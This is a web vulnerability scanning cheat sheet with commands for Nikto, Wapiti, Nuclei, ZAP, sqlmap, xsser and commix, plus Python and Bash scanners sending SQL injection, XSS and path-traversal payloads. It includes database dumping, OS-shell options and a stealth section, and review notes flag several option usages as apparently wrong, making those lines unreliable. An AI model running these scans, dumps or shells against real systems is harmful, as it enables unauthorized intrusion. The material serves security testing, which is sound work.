Vulnerability Scanner Tools
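Vulnerability Scanner Tools

Comprehensive collection of web application vulnerability scanner tools and techniques for security testing.

Nikto

Basic Vulnerability Scanning

# Basic vulnerability scan
nikto -h http://TARGET_URL
# With HTTPS
nikto -h https://TARGET_URL
# With specific port
nikto -h http://TARGET_URL -p 8080
# With multiple hosts
nikto -h http://TARGET_URL1,http://TARGET_URL2
# With output file
nikto -h http://TARGET_URL -o results.txt
# With XML output
nikto -h http://TARGET_URL -Format xml -o results.xml
# With JSON output
nikto -h http://TARGET_URL -Format json -o results.json
# With verbose output (nikto controls verbosity with -Display; V is the verbose level)
nikto -h http://TARGET_URL -Display V
# With silent output
# NOTE(review): -s is not a documented "silent" switch in nikto's option list; confirm with `nikto -Help`
nikto -h http://TARGET_URL -s

Advanced Nikto Options

# With specific plugins
nikto -h http://TARGET_URL -Plugins "apacheusers,backdoors"
# With all plugins
nikto -h http://TARGET_URL -Plugins all
# With exclude plugins
# NOTE(review): -exclude and (below) -retries do not appear in nikto's documented options; confirm with `nikto -Help`
nikto -h http://TARGET_URL -Plugins "apacheusers,backdoors" -exclude "apacheusers"
# With custom user agent
nikto -h http://TARGET_URL -useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
# With cookies
# NOTE(review): in nikto, -C is the short form of -Cgidirs (which CGI directories to scan), not a cookie option;
# this line presumably does not send the cookie — confirm
nikto -h http://TARGET_URL -C "PHPSESSID=abc123"
# With authentication (id:password is given on the command line, so it ends up in shell history and the process list)
nikto -h http://TARGET_URL -id admin:password
# With proxy
nikto -h http://TARGET_URL -useproxy http://127.0.0.1:8080
# With timeout
nikto -h http://TARGET_URL -timeout 10
# With retries
nikto -h http://TARGET_URL -retries 3
# With SSL options (-ssl forces SSL and -nossl disables it, so only one of the two is given)
nikto -h https://TARGET_URL -ssl
# With specific checks
# NOTE(review): nikto documents tuning classes 0-9, a-e and x, where x inverts the selection; the remaining
# letters listed here are presumably not valid classes — confirm
nikto -h http://TARGET_URL -Tuning 1,2,3,4,5,6,7,8,9,0,a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z

Wapiti

Basic Vulnerability Scanning

# Basic vulnerability scan
wapiti -u http://TARGET_URL
# With HTTPS
wapiti -u https://TARGET_URL
# With specific port
wapiti -u http://TARGET_URL:8080
# With output file
wapiti -u http://TARGET_URL -o results.txt
# With XML output
wapiti -u http://TARGET_URL -f xml -o results.xml
# With JSON output
wapiti -u http://TARGET_URL -f json -o results.json
# With verbose output (-v takes a level: 0 quiet, 1 normal, 2 verbose)
wapiti -u http://TARGET_URL -v 2
# With silent output (-s is wapiti's "start URL" option, so quiet output is -v 0)
wapiti -u http://TARGET_URL -v 0

Advanced Wapiti Options

# With specific modules
wapiti -u http://TARGET_URL -m "sql,xss,file,exec,ssrf"
# With all modules
wapiti -u http://TARGET_URL -m all
# With exclude modules
# NOTE(review): -e is not in wapiti's documented options; modules are presumably excluded inside the -m list
# itself — confirm with `wapiti -h`
wapiti -u http://TARGET_URL -m "sql,xss,file,exec,ssrf" -e "sql"
# With custom user agent (-A / --user-agent; -a is the credentials option used under "With authentication")
wapiti -u http://TARGET_URL -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
# With cookies
# NOTE(review): wapiti's -c is documented as taking a cookie file rather than a name=value pair — confirm for
# the installed version
wapiti -u http://TARGET_URL -c "PHPSESSID=abc123"
# With authentication (credentials on the command line are visible in shell history and the process list)
wapiti -u http://TARGET_URL -a admin:password
# With proxy
wapiti -u http://TARGET_URL -p http://127.0.0.1:8080
# With timeout
wapiti -u http://TARGET_URL -t 10
# With retries
# NOTE(review): wapiti documents -r as --remove (drop a URL parameter), not a retry count — confirm
wapiti -u http://TARGET_URL -r 3
# With SSL options
# NOTE(review): certificate checking in wapiti is controlled by --verify-ssl {0,1}; confirm that -k is accepted
wapiti -u https://TARGET_URL -k
# With cookie and user agent combined
wapiti -u http://TARGET_URL -c "PHPSESSID=abc123" -A "Mozilla/5.0"

Nuclei

Basic Vulnerability Scanning

# Basic vulnerability scan
nuclei -u http://TARGET_URL
# With HTTPS
nuclei -u https://TARGET_URL
# With specific port
nuclei -u http://TARGET_URL:8080
# With multiple targets
nuclei -l targets.txt
# With output file
nuclei -u http://TARGET_URL -o results.txt
# With JSON output
# NOTE(review): recent nuclei releases name this flag -jsonl (short -j); confirm which one the installed
# version accepts
nuclei -u http://TARGET_URL -json -o results.json
# With verbose output
nuclei -u http://TARGET_URL -v
# With silent output
nuclei -u http://TARGET_URL -silent

Advanced Nuclei Options

# With specific templates
nuclei -u http://TARGET_URL -t templates/sql-injection.yaml
# With all templates
nuclei -u http://TARGET_URL -t templates/
# With exclude templates
nuclei -u http://TARGET_URL -t templates/ -exclude-templates templates/sql-injection.yaml
# With custom user agent
nuclei -u http://TARGET_URL -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
# With cookies
nuclei -u http://TARGET_URL -H "Cookie: PHPSESSID=abc123"
# With authentication (the Basic value is only base64 of admin:password, and over http:// it travels unencrypted)
nuclei -u http://TARGET_URL -H "Authorization: Basic YWRtaW46cGFzc3dvcmQ="
# With proxy
nuclei -u \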
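http://TARGET_URL -proxy http://127.0.0.1:8080
# With timeout
nuclei -u http://TARGET_URL -timeout 10
# With retries
nuclei -u http://TARGET_URL -retries 3
# With SSL options
nuclei -u https://TARGET_URL -k
# With specific checks
nuclei -u http://TARGET_URL -t templates/sql-injection.yaml -t templates/xss.yaml

OWASP ZAP

Basic Vulnerability Scanning

# NOTE(review): zap-baseline.py spiders the target and reports passive-scan alerts; it does not send attack
# payloads. Several single-letter options in this section are used with meanings that differ from the script's
# usage text, where -P is the ZAP port, -s short output, -T a time limit in minutes, -a "include alpha passive
# rules", -c a rule config file, -u a rule config URL and -p a progress file. Confirm each line with
# `zap-baseline.py -h` before relying on it.

# Basic vulnerability scan
zap-baseline.py -t http://TARGET_URL
# With HTTPS
zap-baseline.py -t https://TARGET_URL
# With specific port
zap-baseline.py -t http://TARGET_URL:8080
# With output file
zap-baseline.py -t http://TARGET_URL -r results.html
# With XML output
zap-baseline.py -t http://TARGET_URL -x results.xml
# With JSON output
zap-baseline.py -t http://TARGET_URL -J results.json
# With verbose output
zap-baseline.py -t http://TARGET_URL -v
# With silent output
zap-baseline.py -t http://TARGET_URL -s

Advanced OWASP ZAP Options

# With specific policies
zap-baseline.py -t http://TARGET_URL -P policy.xml
# With all policies
zap-baseline.py -t http://TARGET_URL -P all
# With exclude policies
zap-baseline.py -t http://TARGET_URL -P policy.xml -e "sql-injection,xss"
# With custom user agent
zap-baseline.py -t http://TARGET_URL -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
# With cookies
zap-baseline.py -t http://TARGET_URL -c "PHPSESSID=abc123"
# With authentication
zap-baseline.py -t http://TARGET_URL -u admin:password
# With proxy
zap-baseline.py -t http://TARGET_URL -p http://127.0.0.1:8080
# With timeout
zap-baseline.py -t http://TARGET_URL -T 10
# With retries
zap-baseline.py -t http://TARGET_URL -R 3
# With SSL options
zap-baseline.py -t https://TARGET_URL -k
# With specific checks
zap-baseline.py -t http://TARGET_URL -P policy.xml -e "sql-injection,xss"

Custom Scripts

Python Vulnerability Scanner

import queue
import re
import sys
import threading
import time

import requests


def vulnerability_scanner(url, wordlist, threads=10, delay=0, wordlist_path=None):
    """Request every wordlist path under ``url`` with fixed test strings and print matches.

    Args:
        url: Base URL; a trailing slash is stripped before paths are appended.
        wordlist: ``queue.Queue`` used as the work queue (filled by this function).
        threads: Number of worker threads to start.
        delay: Seconds a worker sleeps after finishing one path. One path
            triggers 12 requests (6 + 2 + 4), so the pause is per path, not
            per request, and all workers send concurrently.
        wordlist_path: File with one path per line. When omitted, the
            module-level ``wordlist_file`` is read, as the original script did.

    The three checks are plain substring heuristics. The SQL check in
    particular reports any response whose body contains "error" or "mysql",
    which includes ordinary error pages, so every printed line needs manual
    confirmation before it is recorded as a finding.
    """
    if wordlist_path is None:
        # Backward compatible with the original, which read this global directly.
        wordlist_path = wordlist_file

    def worker():
        while True:
            path = wordlist.get()
            try:
                if path is None:
                    # Sentinel queued after the real work is done.
                    break
                full_url = url.rstrip('/') + '/' + path.strip()

                # SQL Injection check
                sql_payloads = ["'", "\"", "';", "\";", "' OR 1=1--", "\" OR 1=1--"]
                for payload in sql_payloads:
                    test_url = full_url + "?id=" + payload
                    response = requests.get(test_url, timeout=5)
                    body = response.text.lower()
                    if "error" in body or "mysql" in body:
                        print(f"[SQL Injection] {test_url}")

                # XSS check (reports only a verbatim reflection of the test string)
                xss_payloads = ["<script>alert('XSS')</script>", "<img src=x onerror=alert('XSS')>"]
                for payload in xss_payloads:
                    test_url = full_url + "?search=" + payload
                    response = requests.get(test_url, timeout=5)
                    if payload in response.text:
                        print(f"[XSS] {test_url}")

                # Directory traversal check
                traversal_payloads = ["../", "..\\", "....//", "....\\\\"]
                for payload in traversal_payloads:
                    test_url = full_url + "?file=" + payload + "etc/passwd"
                    response = requests.get(test_url, timeout=5)
                    if "root:" in response.text:
                        print(f"[Directory Traversal] {test_url}")

                time.sleep(delay)
            except Exception as exc:
                # Best effort: keep scanning, but say which path failed instead of
                # hiding timeouts, refused connections and coding errors alike.
                print(f"[error] {path}: {exc}", file=sys.stderr)
            finally:
                wordlist.task_done()

    # Start threads
    workers = []
    for _ in range(threads):
        t = threading.Thread(target=worker, daemon=True)
        t.start()
        workers.append(t)

    # Add paths to queue (blank lines would otherwise rescan the base URL)
    with open(wordlist_path, 'r') as f:
        for line in f:
            entry = line.strip()
            if entry:
                wordlist.put(entry)

    # Wait for completion
    wordlist.join()

    # Stop the workers; the original never queued the None they wait for.
    for _ in workers:
        wordlist.put(None)
    for t in workers:
        t.join()


# Usage
url = "http://TARGET_URL"
wordlist_file = "/usr/share/wordlists/dirb/common.txt"
wordlist = queue.Queue()
vulnerability_scanner(url, wordlist, threads=20, delay=0.1, wordlist_path=wordlist_file)

Bash Vulnerability Scanner

#!/bin/bash
set -euo pipefail

TARGET_URL="http://TARGET_URL"
WORDLIST="/usr/share/wordlists/dirb/common.txt"
THREADS=10

#######################################
# Function to check vulnerabilities: requests one wordlist path with each
# fixed test string and prints a line per match.
# Globals:   TARGET_URL (read)
# Arguments: $1 - path relative to TARGET_URL
# Outputs:   "[Check] URL" lines on stdout
# Notes:     The matches are substring heuristics (any body containing
#            "error" or "mysql" counts as a SQL hit), so every line needs
#            manual confirmation. There is no pause between requests; the
#            only limit on load is the -j value passed to parallel.
#######################################
check_vulnerabilities() {
  local path=$1
  local full_url="${TARGET_URL}/${path}"
  local payload test_url response
  local -a sql_payloads xss_payloads traversal_payloads

  # SQL Injection check
  sql_payloads=("'" "\"" "';" "\";" "' OR 1=1--" "\" OR 1=1--")
  for payload in "${sql_payloads[@]}"; do
    test_url="${full_url}?id=${payload}"
    # curl does not percent-encode a URL it is handed, so the value is sent
    # with -G --data-urlencode; test_url is kept only for the report line.
    # --max-time keeps one unresponsive path from stalling a worker.
    response=$(curl -s --max-time 5 -G --data-urlencode "id=${payload}" "$full_url") || continue
    if grep -qi "error\|mysql" <<<"$response"; then
      printf '%s\n' "[SQL Injection] $test_url"
    fi
  done

  # XSS check
  xss_payloads=("<script>alert('XSS')</script>" "<img src=x onerror=alert('XSS')>")
  for payload in "${xss_payloads[@]}"; do
    test_url="${full_url}?search=${payload}"
    response=$(curl -s --max-time 5 -G --data-urlencode "search=${payload}" "$full_url") || continue
    # -F: compare the test string literally instead of as a regular expression.
    if grep -qF -- "$payload" <<<"$response"; then
      printf '%s\n' "[XSS] $test_url"
    fi
  done

  # Directory traversal check
  traversal_payloads=("../" "..\\" "....//" "....\\\\")
  for payload in "${traversal_payloads[@]}"; do
    test_url="${full_url}?file=${payload}etc/passwd"
    response=$(curl -s --max-time 5 -G --data-urlencode "file=${payload}etc/passwd" "$full_url") || continue
    if grep -q "root:" <<<"$response"; then
      printf '%s\n' "[Directory Traversal] $test_url"
    fi
  done
}

# Export function for parallel
export -f check_vulnerabilities
export TARGET_URL

# Run parallel vulnerability check
parallel -j "$THREADS" check_vulnerabilities {} < "$WORDLIST"

Vulnerability Types

SQL Injection

# Basic SQL injection test
sqlmap -u "http://TARGET_URL/page.php?id=1"
# With POST data
sqlmap -u "http://TARGET_URL/login.php" --data="username=admin&password=admin"
# With cookies
sqlmap -u "http://TARGET_URL/page.php?id=1" --cookie="PHPSESSID=abc123"
# With headers
sqlmap -u "http://TARGET_URL/page.php?id=1" --headers="User-Agent: CustomAgent"
# With proxy
sqlmap -u "http://TARGET_URL/page.php?id=1" --proxy="http://127.0.0.1:8080"
# With authentication
sqlmap -u "http://TARGET_URL/page.php?id=1" --auth-type=basic --auth-cred="admin:password"
# With database enumeration
sqlmap -u "http://TARGET_URL/page.php?id=1" --dbs
sqlmap -u "http://TARGET_URL/page.php?id=1" --tables
sqlmap -u "http://TARGET_URL/page.php?id=1" --columns -T users
sqlmap -u "http://TARGET_URL/page.php?id=1" --dump -T users
# With OS shell
sqlmap -u "http://TARGET_URL/page.php?id=1" --os-shell

XSS (Cross-Site Scripting)

# Basic XSS test
xsser -u "http://TARGET_URL/page.php?search=test"
# With POST data
xsser -u "http://TARGET_URL/login.php" --data="username=admin&password=admin"
# With cookies
xsser -u "http://TARGET_URL/page.php?search=test" --cookie="PHPSESSID=abc123"
# With headers
xsser -u "http://TARGET_URL/page.php?search=test" --headers="User-Agent: CustomAgent"
# With proxy
xsser -u "http://TARGET_URL/page.php?search=test" --proxy="http://127.0.0.1:8080"
# With authentication
xsser -u "http://TARGET_URL/page.php?search=test" --auth="admin:password"
# With payloads
xsser -u "http://TARGET_URL/page.php?search=test" --payload="<script>alert('XSS')</script>"
# With encoding
xsser -u "http://TARGET_URL/page.php?search=test" --encode

Command Injection

# Basic command injection test
commix -u "http://TARGET_URL/page.php?cmd=test"
# With POST data
commix -u "http://TARGET_URL/login.php" --data="username=admin&password=admin"
# With cookies
commix -u "http://TARGET_URL/page.php?cmd=test" --cookie="PHPSESSID=abc123"
# With headers
commix -u "http://TARGET_URL/page.php?cmd=test" --headers="User-Agent: CustomAgent"
# With proxy
commix -u "http://TARGET_URL/page.php?cmd=test" --proxy="http://127.0.0.1:8080"
# With authentication
commix -u "http://TARGET_URL/page.php?cmd=test" --auth="admin:password"
# With OS shell
commix -u "http://TARGET_URL/page.php?cmd=test" --os-shell

Best Practices

Rate Limiting

# Add delay between requests (-Pause is the pause in seconds between tests; -timeout only limits how long a
# single request may take)
nikto -h http://TARGET_URL -Pause 1
# Use fewer threads (-c sets nuclei's concurrency; -t selects templates)
nuclei -u http://TARGET_URL -c 10
# Route traffic through a proxy (one -proxy value is a single fixed proxy, not rotation)
nuclei -u http://TARGET_URL -proxy http://proxy1:8080

Stealth Mode

# NOTE(review): changing the User-Agent alters one header only; request rate and the paths requested still
# mark the traffic as a scan in server and WAF logs.
# Use a custom user agent (a fixed string as written, not a random one)
nikto -h http://TARGET_URL -useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
# Cap the request rate (-rate-limit is the maximum number of requests per second)
nuclei -u http://TARGET_URL -rate-limit 50
# Run a single template instead of the whole set
nuclei -u http://TARGET_URL -t templates/sql-injection.yaml

Output Analysis

# Save results to file
nikto -h http://TARGET_URL -o results.txt
# NOTE(review): the greps below only match reports that contain these literal labels. "[SQL Injection]" and
# "[XSS]" are what the custom scripts above print; nikto's text report is presumably not tagged with
# HIGH/MEDIUM/LOW — confirm against a real results.txt.
# Filter by severity
grep "HIGH" results.txt
grep "MEDIUM" results.txt
grep "LOW" results.txt
# Sort by vulnerability type
grep "SQL Injection" results.txt
grep "XSS" results.txt
grep "Command Injection" results.txt

Troubleshooting

Common Issues

# Connection timeout
nikto -h http://TARGET_URL -timeout 30
# Too many requests
nuclei -u http://TARGET_URL -rate-limit 50
# Invalid SSL certificate
# NOTE(review): confirm -k against `nuclei -h`; with certificate validation off, results and any credentials
# sent cannot be tied to the intended host.
nuclei -u https://TARGET_URL -k
# Authentication required (the Basic value is only base64 of admin:password, and over http:// it travels
# unencrypted)
nuclei -u http://TARGET_URL -H "Authorization: Basic YWRtaW46cGFzc3dvcmQ="

Performance Optimization

# Use appropriate thread count (-c sets nuclei's concurrency; -t selects templates)
nuclei -u http://TARGET_URL -c 20
# Use a single template for the initial scan
nuclei -u http://TARGET_URL -t templates/sql-injection.yaml
# Use specific templates
nuclei -u http://TARGET_URL -t templates/sql-injection.yaml -t templates/xss.yaml

Legal and Ethical Considerations

- Always obtain proper authorization before testing
- Respect rate limits and server resources
- Use appropriate tools for the target
- Document findings properly
- Follow responsible disclosure practices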